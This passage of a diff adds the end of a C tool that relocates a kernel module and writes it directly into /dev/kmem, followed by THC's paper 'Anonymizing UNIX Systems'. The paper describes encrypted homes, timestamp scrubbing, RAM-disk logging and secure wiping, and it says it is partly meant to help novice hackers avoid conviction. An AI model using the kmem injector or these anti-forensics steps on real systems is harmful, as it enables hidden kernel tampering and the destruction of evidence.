+			if (i != ehdr->e_shstrndx)
+				module->strtabidx = i;
+			break;
+
+		case SHT_SYMTAB:
+		case SHT_PROGBITS:
+		case SHT_REL:
+			load_section(sectionp, fd, shdr);
+			break;
+
+		default:
+			fprintf(
+				stderr,
+				"No handler for section (type): %i\n",
+				shdr->sh_type
+			);
+			exit(1);
+		}
+
+		++shdr;
+	}
+}
+
+void relocate(struct _module *module, Elf32_Rel *rel, Elf32_Shdr *shdr)
+{
+	Elf32_Sym *symtab = (Elf32_Sym *)module->section[shdr->sh_link];
+	Elf32_Sym *sym = &symtab[ELF32_R_SYM(rel->r_info)];
+	Elf32_Addr addr;
+	Elf32_Shdr *targshdr = &module->shdr[shdr->sh_info];
+	Elf32_Addr dot =  targshdr->sh_addr + rel->r_offset;
+	Elf32_Addr *loc = (Elf32_Addr *)(
+		module->section[shdr->sh_info] + rel->r_offset
+	);
+	char *name = &module->section[module->strtabidx][sym->st_name];
+
+	if (ELF32_ST_BIND(sym->st_info) != STB_LOCAL) {
+		struct kernel_sym *ksym;
+
+		if (force) {
+			char novname[60];
+			int len;
+
+			len = strlen(name);
+			if (len > 10 && !strncmp(name + len - 10, "_R", 2)) {
+				strncpy(novname, name, len - 10);
+				novname[len - 10] = 0;
+				ksym = ksyms_find(novname);
+			} else
+				ksym = ksyms_find(name);
+		} else
+			ksym = ksyms_find(name);
+		if (ksym != NULL) {
+			addr = ksym->value;
+
+#ifdef DEBUG
+			printf(
+				"Extern symbol is (%s:%lx)\n",
+				ksym->name,
+				(unsigned long)addr
+			);
+#endif
+			goto next;
+		}
+
+		if (
+			sym->st_shndx == 0 ||
+			sym->st_shndx > module->ehdr.e_shnum
+		) {
+			fprintf(
+				stderr,
+				"ERROR: undefined symbol (%s)\n", name
+			);
+			++error;
+			return;
+		} 
+	}
+
+	addr = sym->st_value + module->shdr[sym->st_shndx].sh_addr;
+
+#ifdef DEBUG
+	printf("Symbol (%s:%lx) is local\n", name, (unsigned long)addr);
+#endif
+
+next:
+	if (targshdr->sh_type == SHT_SYMTAB) return;
+	if (targshdr->sh_type != SHT_PROGBITS) {
+		fprintf(
+			stderr,
+			"Rel not PROGBITS or SYMTAB (type: %i)\n",
+			targshdr->sh_type
+		);
+		exit(1);
+	}
+
+	switch (ELF32_R_TYPE(rel->r_info)) {
+	case R_386_NONE:
+		break;
+
+	case R_386_PLT32:
+	case R_386_PC32:
+		*loc -= dot;	/* *loc += addr - dot	*/
+
+	case R_386_32:
+		*loc += addr;
+		break;
+
+	default:
+		fprintf(
+			stderr, "No handler for Relocation (type): %i",
+			ELF32_R_TYPE(rel->r_info)
+		);
+		exit(1);
+	}
+}
+
+void relocate_module(struct _module *module)
+{
+	int i;
+
+	for (i = 0; i < module->ehdr.e_shnum; i++) {
+		if (module->shdr[i].sh_type == SHT_REL) {
+			int j;
+			Elf32_Rel *relp = (Elf32_Rel *)module->section[i];
+
+			for (
+				j = 0;
+				j < module->shdr[i].sh_size/sizeof(Elf32_Rel);
+				j++
+			) {
+				relocate(
+					module,
+					relp,
+					&module->shdr[i]
+				);
+
+				++relp;
+			}
+		}
+	}
+}
+
+void print_symaddr(struct _module *module, const char *symbol)
+{
+	Elf32_Sym *sym;
+
+	sym = localall_sym_find(module, symbol);
+	if (sym == NULL) {
+		fprintf(stderr, "No symbol (%s)\n", symbol);
+		++error;
+		return;
+	}
+
+	printf(
+		"%s: 0x%lx\n",
+		symbol,
+		(unsigned long)module->shdr[sym->st_shndx].sh_addr
+			+ sym->st_value
+	);
+}
+
+void init_module(struct _module *module, unsigned long maddr)
+{
+	int i;
+	unsigned long len = 0;
+
+	module->maddr = maddr;
+
+	for (i = 0; i < module->ehdr.e_shnum; i++) {
+		if (module->shdr[i].sh_type != SHT_PROGBITS) continue;
+
+		module->shdr[i].sh_addr = len + maddr;
+		len += module->shdr[i].sh_size;
+	}
+
+	module->len = len;
+
+	if (module->maxlen > 0 && module->len > module->maxlen) {
+		fprintf(
+			stderr,
+			"Module too large: (modsz: %i)\n",
+			module->len
+		);
+		exit(1);
+	}
+
+	printf("Module length: %i\n", module->len);
+	
+	relocate_module(module);
+
+	print_symaddr(module, "init_module");
+	print_symaddr(module, "cleanup_module");
+}
+
+void do_module(struct _module *module, int fd)
+{
+	int kd;
+	int i;
+
+#ifdef DEBUG
+	for (i = 0; i < module->ehdr.e_shnum; i++) {
+		if (module->shdr[i].sh_type != SHT_PROGBITS) continue;
+
+		if (lseek(fd, module->shdr[i].sh_offset, SEEK_SET) < 0) {
+			perror("lseek");
+			exit(1);
+		}
+
+		if (
+			write(
+				fd, module->section[i], module->shdr[i].sh_size
+			) != module->shdr[i].sh_size
+		) {
+			perror("write");
+			exit(1);
+		}
+	}
+#else
+
+	kd = open("/dev/kmem", O_RDWR);
+	if (kd < 0) {
+		perror("open");
+		exit(1);
+	}
+
+	if (lseek(kd, module->maddr, SEEK_SET) < 0) {
+		perror("lseek");
+		exit(1);
+	}
+
+	for (i = 0; i < module->ehdr.e_shnum; i++) {
+		if (module->shdr[i].sh_type != SHT_PROGBITS) continue;
+
+		if (
+			write(
+				kd, module->section[i], module->shdr[i].sh_size
+			) != module->shdr[i].sh_size
+		) {
+			perror("write");
+			exit(1);
+		} 
+	}
+
+	close(kd);
+#endif
+}
+
+int main(int argc, char *argv[])
+{
+	char *map = system_map;
+	struct _module module;
+	int fd;
+	int ch;
+	int retval = 0;
+
+	while ((ch = getopt(argc, argv, "m:tf")) != EOF) {
+		switch (ch) {
+		case 'm':
+			map = optarg;
+			break;
+
+		case 't':
+			++run;
+			break;
+
+		case 'f':
+			++force;
+			break;
+		}
+	}
+
+/*
+	so we can move options in and out without changing the codes idea
+	of what argv and argc look like.
+*/
+
+	--optind;
+
+	argv += optind;
+	argc -= optind;
+
+	if (argc != 3 && argc != 4) {
+		fprintf(
+			stderr,
+			"usage: k module [-t] [-m map] maddr(hex) [maxlen]\n"
+		);
+		exit(1);
+	}
+
+#ifdef DEBUG
+	fd = open(argv[1], O_RDWR);
+#else
+	fd = open(argv[1], O_RDONLY);
+#endif
+	if (fd < 0) {
+		perror("open");
+		exit(1);
+	}
+
+	if (ksyms_init(map) < 0) {
+		perror("ksyms_init");
+		exit(1);
+	}
+
+	module.maxlen = (argc == 4 ? atoi(argv[3]) : -1);
+	load_module(&module, fd);
+	init_module(&module, strtoul(argv[2], NULL, 16));
+	if (run == 0) {
+		if (error == 0) {
+			do_module(&module, fd);
+		} else {
+			fprintf(
+				stderr,
+				"FAILED: (%i) errors. Exiting...\n", error
+			);
+			++retval;
+		}
+	}
+ 
+	ksyms_cleanup();
+
+	exit(retval);
+}
+</xmp>
+</HTML>

Papers/anonymous-unix.html

@@ -0,0 +1,1101 @@
+<HTML>
+<HEAD>
+<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
+<TITLE>Anonymous Unix Systems</TITLE>
+</HEAD>
+
+<BODY BGCOLOR="#FFFFFF">
+<center>
+<h1>
+---[  Anonymizing UNIX Systems  ]---
+<br>
+version 0.9
+</h1>
+<br><br>
+<table border=3 cellpadding=7 cellspacing=3>
+<tr><td>Author: <I><a href="mailto:vh@reptile.rug.ac.be">van Hauser</a> /
+THC</I><br>
+</td></tr>
+</table>
+</center>
+<br><br><br><br>
+<ul>
+I.    <A HREF="#1">THE AUDIENCE</A><ul></ul><br>
+II.   <A HREF="#2">GOAL</A><ul></ul><br>
+III.  <A HREF="#3">PREREQUISITES</A><ul></ul><br>
+IV.   <A HREF="#4">USER DATA</A><br>
+<ul>     1. <A HREF="#41">Sensitive user data</A><br>
+     2. <A HREF="#42">Protecting /home directories</A><br>
+     3. <A HREF="#43">Traceable user activity</A><br>
+     4. <A HREF="#44">Protecting /var/spool/mail/user files</A></ul><br>
+V.    <A HREF="#5">SYSTEM DATA</A><br>
+<ul>     1. <A HREF="#51">Sensitive system data</A><br>
+     2. <A HREF="#52">Traceable system activity</A><br>
+     3. <A HREF="#53">Logging - important and dangerous</A><br>
+     4. <A HREF="#54">Protecting system configs</A><br>
+     5. <A HREF="#55">Computer Memory and sensitive /proc interfaces</A></ul><br>
+VI.   <A HREF="#6">DELETE(D) DATA AND SWAP</A><br>
+<ul>     1. <A HREF="#61">How to delete files in a secure way</A><br>
+     2. <A HREF="#62">How to wipe free disk space</A><br>
+     3. <A HREF="#63">How to handle swap data</A><br>
+     4. <A HREF="#64">How to handle RAM</A><br>
+     5. <A HREF="#65">Temporary data - it is evil</A></ul><br>
+VII.  <A HREF="#7">NETWORK CONNECTIONS</A><ul></ul><br>
+VIII. <A HREF="#8">HIDING PRIVACY SETTINGS</A><br>
+<ul>     1. <A HREF="#81">Mount is your friend</A><br>
+     2. <A HREF="#82">Removable Medias</A><br>
+     3. <A HREF="#83">???</A></ul><br>
+IX.  <A HREF="#9">EXAMPLE CONFIGURATION AND SCRIPTS</A><br>
+X.   <A HREF="#10">FINAL COMMENTS</A><br>
+<ul>     1. <A HREF="#101">Where to get the tools mentioned in this text</A><br>
+     2. <A HREF="#102">Additional thoughts</A><br>
+     3. <A HREF="#103">Greetings (what would the world be without greets?)</A><br>
+     4. <A HREF="#104">How to contact me for updates or comments</A></ul><br>
+</ul>
+<br><br>
+<center>
+--------------------
+</center><br><br><br><br>
+
+
+
+<A NAME="1"></A>
+<bold>* I.    THE AUDIENCE</bold>
+<br>
+<br>
+
+This text is for any human being out there who wishes to keep their data and
+doings private from any snooping eye - monitoring network traffic and
+stealing/accessing the computer including electronic forensics.
+Hackers, phreakers, criminals, members of democracy parties in totalitarian
+states, human rights workers, and people with high profiles might be
+interested in this information.
+It was especially written for novice hackers so they are not so easily
+convicted when busted for their early curiosity.
+<br>
+<br>
+
+Thanks to Solar Designer, Fyodor, typo, tick, pragmatic, mixter and
+doc holiday for comments, critics and ideas.
+<br>
+Special thanks to rookie who had the original idea writing this paper
+but through personal problems couldn't do it himself.
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="2"></A>
+<bold>* II.   GOAL</bold>
+<br>
+<br>
+
+Our goal is to provide solutions to the following statements:
+<br>
+<br>
+<ul>
+   (1) The solution should be simple and easy<br>
+   (2) All user data should be inaccessible by anyone except their owner<br>
+   (3) Nobody should be able to reconstruct what is happening on the system<br>
+</ul>
+
+Maybe you see contradictions ;-)
+
+
+<br>
+<br>
+<br>
+<br>
+<A NAME="3"></A>
+<bold>* III.  PREREQUISITES</bold>
+<br>
+<br>
+
+It is important to state the prerequisites for this project:
+<br>
+<ul>
+    - The system should be secure. No remote vulnerabilities (and hopefully
+      no local ones either)<br>
+    - The system administator(s) must be trusted and willing to set this up<br>
+    - The operating system to achieve this is a UNIX<br>
+</ul>
+
+Note that the solutions presented do not 100% fit internet servers.
+<br>
+However it's (nearly, bah ;-) perfect for enduser systems.
+<br>
+<br>
+
+For the UNIX part, we show the solutions for Linux because it is the unix
+most easily for beginners to get their hands on and administrate.
+<br>
+The Linux distribution we use is the SuSE Linux Distribution 6.0
+<br>
+Debian is better but more complicated for beginners. And I dislike
+redhat for it's missing security.
+<br>
+You should know enough about unix (what is portmap, mount, rc2.d etc.)
+before trying to understand this text. It's *not* a Linux-Howto!
+
+
+
+<br>
+<br>
+<br>
+<br>
+<A NAME="4"></A>
+<bold>* IV.   USER DATA</bold>
+<br>
+<A NAME="41"></A>
+<bold>*** 1. Sensitive user data</bold>
+<br>
+<br>
+
+What is sensitive user data? Well *any* data from a user account.
+This includes:
+<ul>
+    - utmp/wtmp/lastlog data (login times and duration plus login hosts)<br>
+    - history files (what commands you typed in your session)<br>
+    - your emails<br>
+    - temporary files from applications like mailers, browsers etc.<br>
+    - applications and their configuration<br>
+    - your own data (documents, porn pics, confidental data)<br>
+    - time stamps on your data (when were you accessing/editing which data)<br>
+    - on multiuser systems: what users CURRENTLY are doing.. this includes
+      process listing, and network connections as well as utmp (which is
+      already covered by another category). -&gt; make proc more restrictive.<br>
+</ul>
+<br>
+
+
+We are trying to protect all this data.
+<br>
+Note that utmp/wtmp/lastlog data and mail (mqueue/mail/fax/lpd) is handled
+in the SYSTEM DATA section.
+<br>
+Note that all user accounts can be seen from /etc/passwd ;-) So maybe you'd
+like to add some/many fake accounts, together with homedirs and crypted
+data ...
+<br>
+<br>
+<br>
+
+
+<A NAME="42"></A>
+<bold>*** 2. Protecting /home directories</bold>
+<br>
+<br>
+
+Most important for protecting user data is protecting the users' /home
+directories.
+<br>
+Each home directory must be encrypted with a strong cypher so that even
+with full physical access to the system the data can't be obtained.
+Currently I know of only one software provididing a solution to our
+requirements: CFS - the cryptographic filesystem.
+<br>
+<br>
+
+There are also some other crypto solutions available : TCFS, SFS and the
+loop filesystem with crypt support. They are faster but have got the
+disadvantage that you'll have to recompile your kernel with patches from
+these tools. So for the sake of easeness, I stick with CFS here.
+(Pointers to all tools mentioned in this text can be found at the end)
+
+<br>
+<br>
+To enable CFS we must put these six lines in a rc2.d script:
+<pre>        portmap
+        rpc.mountd -P 894     # mountd should bind to port 894
+        cfsd 895              # cfsd   should bind to port 895
+        rm -rf /tmp/.tmp
+        mkdir -p -m 700 /tmp/.tmp
+        mount -o port=895,intr localhost:/tmp/.tmp /home
+</pre>
+
+Additionaly we have to put this entry into /etc/exports:
+<pre>        /tmp/.tmp       localhost
+</pre>
+
+<br>
+<br>
+Okay. This starts the sunrpc with the mountdaemon which are necessary
+for CFS to be started and used.
+<br>
+Now we need to get the following going: if a user logs on, the system
+has to check if he's already logged in to decide whether to decrypt the users'
+home directory.  This sounds hard but is easy: the user's /home/user
+directory doesn't exist (even if it would, because of mount command nine
+lines above would make it nonexistent), so the user's HOME variable is
+set to '/' the root directory. Then his login shell is started which
+looks for it's start scripts. And that's were we put our hooks in.
+<br>
+We create (this example is for bash) the file /.profile with the following
+contents:
+<pre>        cattach /crypt/$USER $USER  ||  exit 0
+        export HOME=/home/$USER
+        cd $HOME
+        if test -f $HOME/.profile; then
+                . $HOME/.profile
+        fi
+</pre>
+
+<br>
+When a user logs on the first time, this script will be executed. The user
+has to enter the password for his crypted homedir, and after this his
+correct HOME variable is set and the normal login profile is read and done.
+If a user doesn't know the passphrase for his crypted homedir, he is logged
+out.
+<br>
+<br>
+But how do we remove the decrypted homedir after the user logs out? This
+script should be clever, because a user could be logged in several times at
+once, and it should only be removed when the last loginshell exits.
+<br>
+Thank god, this is easy too, we create a /home/user/.bash_logout script:
+<pre>        # if the number of user's login shells are &gt; 3 then this is the last.
+        shells=`ps xu | grep -- "$USER .* S .* -[^ ]*sh" | wc -l`
+        test $shells -lt 3 || exit 0
+        export HOME=/
+        cd /
+        cdetach $USER
+</pre>
+
+<br>
+Thats all. From now on, the users' homedirectories are safe.
+
+<br>
+<br>
+Note that a user can't login now, start a background job which writes data
+in his homedirectory and log out because his homedirectory would be removed.
+The full .bash_logout script I provide in (see two lines below) checks for
+a $HOME/.keep file and if present doesn't remove the homedir.
+<br>
+
+<br>
+For network logins you should keep in mind that they should not be done via
+rlogin, telnet, etc. because they send all traffic (including passwords) in
+plaintext over the network. You should use a tool which encrypts the whole
+traffic like SSLtelnet or SSH (for SSH you need to set "UseLogin yes" in
+the /etc/sshd_config file).
+
+<br>
+<br>
+You'll find all these scripts with error checking, user creating, stop
+scripts and config files etc. in section IX. EXAMPLE CONFIGURATION
+<br>
+
+<br>
+Note that we started daemons in the section which can be contacted from
+remote. If you don't want this (because there are no external users who
+need to mount their crypted user data on their own machine) you should
+firewall these ports. Look in you manpages ("man ipchains" or "man ipfwadm").
+
+<br>
+<br>
+<br>
+<A NAME="43"></A>
+<bold>*** 3. Traceable user activity</bold>
+<br>
+<br>
+
+[Warning, this section shows first how to perform simple electronic forensics]
+<br>
+It is easy to see who logged on the system and what he did by the
+timestamps. Even if all your data is crypted, by checking the last access
+time (atime) of your files, someone may check when you logged in last time,
+for what duration and if you were idleing or doing much stuff.
+<br>
+If the systems doesn't have many users, someone might even tell what you
+did.
+<br>
+<br>
+Example: The earliest access time for a crypted file in your homedir
+can be seen by: 
+<pre>
+        ls -altur /crypt/$USER | head -1 # shows the logout file
+        ls -altu  /crypt/$USER | more    # with some brain you'll find
+                                         # the login time
+</pre>
+
+<br>
+then you also have the duration of the session.
+<br>
+By checking the change/modification and access time of those crypted files
+with their timestamps someone can see how hard you were working, and get
+more conclusions (e.g. if many files nested in a three levels deep
+directory where modified this is probably a browser - so you were surfing
+the net).
+<br>
+<br>
+This insight will now make it possible to check what commands were run:
+<br>
+Let's say the login time as 22 hours ago, so you run:
+<pre>
+        find / -type f -atime 0 -ls # shows the accessed files
+        find / -type f -mtime 0 -ls # shows the modified files
+</pre>
+<br>
+(this can be done with directories too)
+<br>
+<br>
+Now check the output for the correct timeframe and analyze what you found.
+e.g. the telnet client was accessed. So it's probable, the user used it
+to connect to another system. I think you can imagine now what is possible.
+
+<br>
+<br>
+To protect against this is also very easy:
+<br>
+Create the file /usr/local/bin/touch_them and make it executable with
+the following contents:
+<pre>
+        find /crypt /tmp /etc /var/spool 2&gt; /dev/null | xargs -n 250 touch
+</pre>
+
+<br>
+Then put the following line into /etc/crontab:
+<pre>
+        50 * * * *      root   /usr/local/bin/touch_them
+</pre>
+
+<br>
+finally you change the 4th row of all lines in /etc/fstab which have the
+keyword "ext2" in their third (the filesystem type) row:
+<pre>         defaults          (or anything else)
+</pre>
+should become
+<pre>         defaults,noatime  (the old value is kept, and noatime is appended)
+</pre>
+
+<br>
+example:
+<pre>         /dev/hda1   /    ext2   defaults  1  1
+</pre>
+becomes
+<pre>         /dev/hda1   /    ext2   defaults,noatime  1  1
+</pre>
+
+<br>
+What did we achieve? The crontab entry with the small script updates the
+atime, mtime and ctime to the current time every hour of special
+directories - especially those which may hold user data.
+<br>
+The mount options we changed now prevent the update of the atime.
+However, this needs a current 2.2.x kernel - it isn't implemented on the
+2.0 kernel tree!
+
+
+<br>
+<br>
+<br>
+<A NAME="44"></A>
+<bold>*** 4. Protecting /var/spool/* files</bold>
+
+<br>
+<br>
+/var/spool/mail :
+<br>
+Now it gets tricky. How can we protect the new mail for a user from
+spying eyes? It can't be sent directly to a user's homedir like qmail would
+do because it's crypted. The easiest solution is to use pgp to encrypt
+your outgoing emails and tell all your friends that they should also encrypt
+all emails to you.
+<br>
+<br>
+However, this is not satisfying. An attacker can still see who sent the user
+the email. The only possibility to hide this is using anonymous remailer.
+This is not a great solution, so this is an open point (see section <a
+href="#102">X.2</a>:
+Additional thoughts)
+<br>
+<br>
+
+/var/spool/{mqueue|fax|lpd} :
+<br>
+Well, all you can do is try to flush the queues when shutting down.
+<br>
+After that you have to decide if you delete the remaining files in a
+secure way or leave it where it is. Or program a special script which does
+something with the data (like taring the data and encrypting it with pgp,
+doing the reverse when the system is rebooted)
+<br>
+<br>
+
+You can also create a whole crypted /var partition, but that would require
+someone at the console while booting the system - every time.
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="5"></A>
+<bold>* V. SYSTEM DATA</bold>
+<br>
+<A NAME="51"></A>
+<bold>*** 1. Sensitive system data</bold>
+<br>
+<br>
+
+What is sensitive system data? *Anything* which gives conclusion on incoming
+and outgoing data, configuration files, logs, reboots and shutdowns.
+<br>
+<br>
+
+This includes:
+<ul>
+    - utmp/wtmp/lastlog data (boot, reboot, shutdown times + user times)<br>
+    - ppp dialup script<br>
+    - sendmail and tcp wrapper configurations<br>
+    - proxy cache data (e.g. squid web/ftp proxy)<br>
+    - syslog messages<br>
+    - /var/spool/* data {mqueue|fax|lpd|mail}<br>
+    - temporary files from daemons<br>
+    - time stamps on data (when were what data accessed/edited)<br>
+</ul>
+<br>
+
+How to prevent time stamp forensica, see section <a href="43">IV.3</a>
+<br>
+How to protect /var/spool/* data, see section <a href="44">IV.4</a> for an incomplete
+solution.
+<br>
+<br>
+
+
+<A NAME="52"></A>
+<bold>*** 2. Traceable system activity</bold>
+<br>
+<br>
+
+(prevent of time stamp forensic is handled in section <a href="43">IV.3</a>)
+To trace system activity, you can easily check temporary files
+of daemons and applications. Some of them write to /tmp, root
+applications usually (should) write to /var/run. 
+We handle this together with section <a href="53">V.3</a>: Logging.
+All you have to do is this, and only *once* :
+<pre>        cd /var
+        mv run log
+        ln -s log/run run
+</pre>
+
+<br>
+this moves the /var/run directory to /var/log/run and sets a symlink in it's
+former place so that applications still find their files.
+<br>
+<br>
+
+
+<A NAME="53"></A>
+<bold>*** 3. Logging - important and dangerous</bold>
+<br>
+<br>
+
+Logging is important to trace problems like misconfigurations.
+<br>
+Logging is dangerous because an attacker can see important data in
+the logfiles, like the user's login and logout time, if they executed
+"su" or other commands etc.
+<br>
+We try to find a balance between this.
+<br>
+Our solution: Write all log data to one special directory.
+<br>
+This directory is a RAM disk so the data is lost after a system shutdown.
+Ensure that syslogd [/etc/syslog.conf] and daemons (e.g. httpd [apache])
+only write to our special logging directory or a system console.
+/var/log should be used as our special logging directory.
+<br>
+<br>
+
+<br>
+Now we put the following commands into /sbin/init.d/boot.local:
+<pre>        umask 027
+        mke2fs -m0 /dev/ram0 1&gt; /dev/null 2&gt;&1
+        rm -rf /var/log/* 2&gt; /dev/null
+        mount -t ext2 /dev/ram0 /var/log
+        chmod 751 /var/log
+        cd /var/log
+        mkdir -m 775 run
+        chgrp uucp run
+        for i in `grep /var/log /etc/syslog.conf|grep -v '^#'| \
+         awk '{print $2}'|sed 's/^-//'`
+	    do &gt; $i ; done
+        umask 007		# 002 might be used too.
+        for i in run/utmp wtmp lastlog
+            do &gt; $i ; chgrp tty $i ; done
+        cd /
+        kill -HUP `pidof syslogd` 2&gt; /dev/null
+</pre>
+
+After your next reboot it behaves like described above.
+
+<br>
+<br>
+Some of you will not like the idea of having no logs after a reboot.
+This way you can't trace an intruder or guess from your logs what
+crashed the machine. Either you can tar the files and pgp before
+the shutdown is complete (but the data would be lost if a crash occurs),
+or you might also use ssyslog or syslog-ng, special syslogs with crypting
+capabilities, and write the data you really want to keep to (just an example)
+/var/slog.
+
+<br>
+<br>
+You can also create a whole crypted /var partition, but that would require
+someone at the console while booting the system - every time.
+<br>
+<br>
+<br>
+
+
+
+<A NAME="54"></A>
+<bold>*** 4. Protecting system configs</bold>
+<br>
+<br>
+This is tricky. It is easy to achieve but for a price.
+If we create an account with uid which has his homedir in /home
+and is hence protected by our CFS configuration, you need to
+be at the console at every reboot. This isn't practical for server systems
+that need to be administrated and rebooted remotely.
+This solution is only good for end-user pcs.
+<br>
+<br>
+
+Just create an account with the uid 0 (e.g. with the login name "admin").
+You can use the create_user script from section IX.
+<br>
+Put all your sensitive configuration files you want to protect into this
+directory (ppp dialup scripts, sendmail.cf configs, squid configs
+with their cache directory set to a subdir of "admin" etc.)
+<br>
+Now create a small shellscript which starts these daemons with a command
+line option to use the config files in your "admin" homedir.
+<br>
+<br>
+
+Your system is then secure from extracting the sensitive information
+from the config files. But for a price. You have to log in after each
+reboot as user "admin", enter your CFS passphrase and start the script.
+<br>
+<br>
+<br>
+
+
+<A NAME="55"></A>
+<bold>*** 5. Computer Memory and sensitive /proc interfaces</bold>
+<br>
+<br>
+
+For a real multiuser system on which the administrator want additionally
+ensure the privacy of the user online, he has to hide the user process
+information, a user would normally see when issuing a "who" or "ps"
+command. To protect the user's process information, you can use
+Solar Designer's secure-linux kernel patch. To protect the utmp/wtmp/lastlog
+we ensure that these files are only readable by root and group tty,
+hence a normal user can't access this data. (This is done in the boot.local
+example script)
+<br>
+Now one problem is left. Even with normal RAM a well funded organisation
+can get the contents after the system is powered off. With the modern
+SDRAM it's even worse, where the data stays on the RAM permanently until
+new data is written. For this, I introduced a small tool for the
+secure_delete package 2.1, called "smem" which tries to clean the memory.
+This one should be called on shutdown. It is done in the example
+in section <a href="64">VI.4</a>
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="6"></A>
+<bold>* VI.   DELETE(D) DATA AND SWAP</bold>
+<br>
+<A NAME="61"></A>
+<bold>*** 1. How to delete files in a secure way<</bold>
+<br>
+<br>
+
+When a file is deleted, only the inode data is freed, the contents of
+the data is NOT wiped and can be gathered with tools like "dd" or the
+tool manpipulate_data from THC.
+<br>
+<br>
+
+Peter Gutmann wrote a paper with the name "Secure Deletion of Data from
+Magnetic and Solid-State Memory" presented 1996 at the 6th Usenix Security
+Symposium. This is the best civilian paper on how to wipe data in a way that
+it is hard for even electronic microscopes to regain the data.
+<br>
+There are four tools out there which uses the techniques described there,
+two called "wipe", one called "srm" from THC's secure_delete package and
+"shred" which is part of the new fileutil package from GNU.
+<br>
+Ours is still the best from it's design, features and security, and it
+has also all important and advanced commandline options and speed you need.
+<br>
+<br>
+
+To use one of these tools for deletion just set an alias in /etc/profile:
+<pre>        alias rm=srm      # or wipe or shred
+</pre>
+
+or even better, move /bin/rm to /bin/rm.orig and copy the secure delete
+program to /bin/rm. This ensures, that all data which is deleted via
+rm is securely wiped.
+<br>
+<br>
+
+If you can't install THC's secure_delete package or any other (for any
+reason) you can also set the wipe flag from the ext2 filesystem on files
+you wish to wipe before rm'ing them. It's nearly the same, but it's NOT
+a secure wipe like mentioned above. It's set by:
+<pre>        chattr +s filename(s)
+</pre>
+
+<br>
+<br>
+[Note that it is *still* possible for a well funded organisation to get your
+data. Don't rely on this! See section <a href="64">VI.4</a> !]
+<br>
+<br>
+<br>
+
+
+<A NAME="62"></A>
+<bold>*** 2. How to wipe free disk space</bold>
+<br>
+<br>
+
+Most times applications like the editor in your mail program write a
+temporary file. And you don't know about it - you weren't even asked :(
+Because they don't wipe the data in a secure way, an attacker can
+get all your private emails just because you didn't know. That's bad.
+<br>
+The solution: You use a wiper program which cleans all unused data
+from the disk partitions.
+<br>
+The only one available is the one from THC's secure_delete package.
+You could put "sfill" (that is what it is called) in you crontab so it is
+run regulary but this might create problems when at this moment this space
+is needed by an important application. At least when the system shuts down,
+sfill should be called.
+<br>
+Put this in the "stop" part of a late rc2.d script:
+<pre>        sfill -llf /tmp 2&gt; /dev/null
+        sfill -llf /var/spool 2&gt; /dev/null
+</pre>
+
+<br>
+<br>
+Note that it is a good idea to generate a new paritition for /tmp itself,
+and putting a symlink from /usr/tmp and /var/tmp to /tmp. This way it is
+easier to control and wipe.
+
+<br>
+<br>
+Again, if you can't install the secure_delete package for any reason,
+you can also use this solution (slower and not as secure):
+<pre>        dd if=/dev/zero of=/tmp/cleanup
+        sync
+        rm /tmp/cleanup
+</pre>
+
+
+<br>
+<br>
+<br>
+<A NAME="63"></A>
+<bold>*** 3. How to handle swap data</bold>
+<br>
+<br>
+
+Securely wiping files and free diskspace - well what's left?
+Today, harddisk MB's are cheaper than RAM, thats why swap space is used to
+expand the available RAM. This is in reality a file or partition on your
+harddisk. And can have your sensitive data in it.
+<br>
+<br>
+
+Again there is only one tool which helps you out here, "sswap" from THC's
+secure_delete package ;-)
+<br>
+Put this line after the "swapoff" line in /sbin/init.d/halt:
+<pre>        sswap -l /dev/XXXX     # the device for your swap, check /etc/fstab
+</pre>
+
+<br>
+<br>
+<br>
+
+<A NAME="64"></A>
+<bold>*** 4. How to handle RAM</bold>
+<br>
+<br>
+
+In section <a href="55">V.5</a> I wrote about sensitive information in your RAM, the fast
+memory of your computer system. It can hold very sensitive information
+like the email you wrote before pgp'ing it, passwords, anything.
+<br>
+To ensure, that the memory is cleaned, use the smem utility.
+<br>
+It should be called like this in the stop part of a late rc2.d script (as
+already mentioned above), after the wiping the file of /tmp etc. and
+then wiping the free memory:
+<pre>        smem -ll
+</pre>
+
+
+<br>
+<br>
+<br>
+
+<A NAME="65"></A>
+<bold>*** 5. Temporary data - it is evil</bold>
+<br>
+<br>
+
+After you have secured/anonymized/privatized your system so far everything's
+ready - or did you forget something?
+<br>
+Remember what we told you in section <a href="61">VI.1</a>, that temporary data is written
+somewhere and sometimes you don't know. If you are unlucky, all we've done
+here was useless. We have to ensure that there's no temporary data
+left on the devices and that it can't be recovered either.
+<br>
+We already dealed with /var/log, /var/run and sent email (/var/spool/...),
+and we wipe all free diskspace from our temporary disk locations.
+Now we must wipe also the temporary data.
+<br>
+Put this line in the stop part of a late rc2.d script (before sfill
+from <a href="63">VI.3</a>):
+<pre>        ( cd /tmp ; ls -A | xargs -n 250 srm -r ; )
+</pre>
+
+Also a $USER/tmp directory should be created for all users under the CFS
+/home protection and a TMPDIR variable set to this directory.
+
+<br>
+<br>
+See section IX. for all these scripts ...
+
+<br>
+<br>
+<br>
+<br>
+
+
+<A NAME="7"></A>
+<bold>* VII.  NETWORK CONNECTIONS</bold>
+<br>
+<br>
+
+This is a very specialized area of this document. I write here a few ways
+how someone can protect some of their data being transfered on the internet.
+<br>
+<br>
+
+The basic prerequisites are as following:
+You've got an external POP3 and SMTP (mail relayer) where you get and send
+your email. When your go on irc, you also don't like your real hostname
+being printed on the channels.
+<br>
+<br>
+
+Your external mail server should be in another country, because if maybe
+some official agencies think you're doing something illegal (and I'm sure
+you won't) it's harder to get a search warrant. It's also harder because
+companies or individuals that try to get your data would need to invest more
+time, work and money to get it.
+<br>
+<br>
+
+You can tunnel your SMTP and POP3 via ssh to the external mail server.
+<br>
+For POP3 this is easy, but for SMTP this is a bit harder.
+<br>
+Just as an example, irc traffic can be tunneled through this as well,
+but dcc stuff won't work (one way doesn't work, the other would reveal
+your ip address to the sender and the data is not encrypted on any part
+of the internet)
+<br>
+Note that you can also use redirectors and proxies to accomplish further
+redirecting for other protocols (www, irc, ftp proxies etc.)
+<br>
+<br>
+
+Thats all. All mail traffic (and as you can see below, irc traffic too) is
+being crypted between you and your mail/proxy server.
+<br>
+<br>
+
+sendmail.cf (important parts):
+<pre>        DSsmtp:[127.0.0.1]
+        DjTHE_DOMAIN_NAME_OF_YOUR_EMAIL
+        DMTHE_DOMAIN_NAME_OF_YOUR_EMAIL
